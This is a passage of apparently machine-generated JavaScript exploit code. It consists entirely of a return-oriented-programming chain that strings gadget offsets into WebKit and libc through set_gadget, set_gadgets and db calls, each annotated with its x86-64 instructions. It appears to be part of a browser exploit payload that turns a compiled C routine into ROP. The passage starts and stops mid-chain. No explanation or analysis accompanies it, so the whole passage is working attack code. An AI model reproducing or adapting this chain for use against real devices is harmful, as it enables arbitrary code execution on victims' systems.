ropchain+273864, //L5179 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+273880, //L5180 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5179: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5180: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5181: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+273976, //L5182 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5182: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5184: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+274096, 
//L5187 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+274080, //L5185 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5185: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5187: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+274240, //L5190 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+274208, //L5188 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+274224, //L5189 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5188: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5189: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5190: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+274320, //L5191 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5191: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5193: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+274440, //L5196 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+274424, //L5194 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5194: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5196: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+274584, //L5199 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+274552, //L5197 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+274568, //L5198 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5197: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5198: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5199: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L5201: ropchain+274688, //L5200 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+192784, //__out_rev //L5200: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967232, 4294967295]); // -0x40 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+274816, //L5202 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+274848, //L5204 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+274832, //L5203 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5202: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5203: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5204: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+274952, //L5205 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi 
ropchain+274968, //L5206 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L5205: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5206: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+275088, //L5207 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+275072, //L5208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L5208: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L5207: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+275176, //L5210 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+275160, //L5209 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5209: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5210: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+275280, //L5211 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+275296, //L5212 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L5211: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5212: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+275416, //L5213 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, 
[rsi] libc_base+764760, //pop rsi ropchain+275400, //L5214 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L5214: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L5213: db([0, 0]); // 0x0 //__ntoa_long: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+275488, //L5216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L5216: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+275552, //L5218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L5218: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([48, 0]); // 0x30 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+275640, //L5220 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5219: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5220: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5221: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+275720, //L5222 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5222: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5224: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L5226: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+275880, //L5229 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+275864, //L5227 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5227: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5229: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+276040, //L5233 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+275992, //L5230 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+276008, //L5231 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5230: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5231: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5232: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5233: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+276176, //L5235 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+276192, //L5236 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+276160, //L5234 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5234: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5235: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5236: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+276304, //L5238 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+276352, //L5241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 
libc_base+764760, //pop rsi ropchain+276320, //L5239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5238: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5239: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5240: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5241: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+276464, //L5242+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+276456, //L5242 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5242: db([0, 0]); // 0x0 set_gadgets([ ropchain+276480, //L5242+24 ropchain+277544, //L5237 libc_base+764760, //pop rsi ropchain+276520, //L5243 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5243: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5245: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+276640, //L5248 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+276624, //L5246 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5246: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5248: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+276816, //L5251 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+276832, //L5252 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+276784, //L5249 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+276800, //L5250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5249: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5250: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5251: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5252: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+276928, //L5254 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+276912, //L5253 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5253: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5254: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5255: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5256: db([4, 0]); // 0x4 set_gadget(libc_base+763368,); //pop rcx //L5257: db([4, 0]); // 0x4 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+277136, //L5259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L5258: db([4294967295, 4294967295]); // 0xffffffffffffffff set_gadget(libc_base+759608,); //pop rax //L5259: db([0, 0]); // 0x0 set_gadgets([ libc_base+847417, //xor rax, rsi ; sub rax, rsi libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+277200, //L5261 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5261: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+277256, //L5262 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5262: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+277392, //L5266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+277376, //L5265 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5264: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5265: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5266: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+277456, //L5267 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5267: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5269: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+277536, //L5270 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5270: db([0, 0]); // 0x0 //L5237: set_gadgets([ libc_base+764760, //pop rsi ropchain+277584, //L5272 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5272: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5274: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+277704, //L5277 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+277688, //L5275 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5275: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5277: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+277880, //L5280 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+277896, //L5281 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+277848, //L5278 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+277864, //L5279 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5278: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5279: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5280: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5281: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+277992, //L5283 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+277976, //L5282 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5282: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5283: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5284: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); 
//L5285: db([10, 0]); // 0xa set_gadget(libc_base+763368,); //pop rcx //L5286: db([10, 0]); // 0xa set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+278192, //L5288 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5288: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+278248, //L5289 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5289: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+278384, //L5293 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+278368, //L5292 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5291: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5292: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5293: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+278504, //L5296 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+278472, //L5294 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5294: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5295: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5296: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop 
rsi ropchain+278640, //L5298 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+278656, //L5299 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+278624, //L5297 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5297: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5298: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5299: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+278816, //L5304 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+278832, //L5305 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+278768, //L5301 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5301: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5302: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L5303: db([1, 0]); // 0x1 set_gadget(webkit_base+3236123,); //pop r9 //L5304: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5305: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+278952, //L5306+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+278944, //L5306 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5306: db([0, 0]); // 0x0 set_gadgets([ ropchain+278968, //L5306+24 ropchain+279368, //L5300 libc_base+764760, //pop rsi ropchain+279008, //L5307 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 
libc_base+763368 //pop rcx ]); //L5307: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5309: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+279128, //L5312 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+279112, //L5310 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5310: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5312: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+279272, //L5315 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+279288, //L5316 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+279240, //L5313 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5313: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5314: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L5315: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5316: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+279360, //L5317 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5317: db([0, 0]); // 0x0 //L5300: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+279488, //L5320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+279504, //L5321 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+279472, //L5319 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5319: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5320: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5321: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+279616, //L5323 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+279664, //L5326 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+279632, //L5324 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5323: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5324: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5325: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5326: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+279776, //L5327+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+279768, //L5327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5327: db([0, 0]); // 0x0 set_gadgets([ ropchain+279792, //L5327+24 ropchain+291080, //L5322 //L5328: libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5329: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5331: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+279928, //L5334 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+279912, //L5332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5332: db([0, 0]); // 0x0 
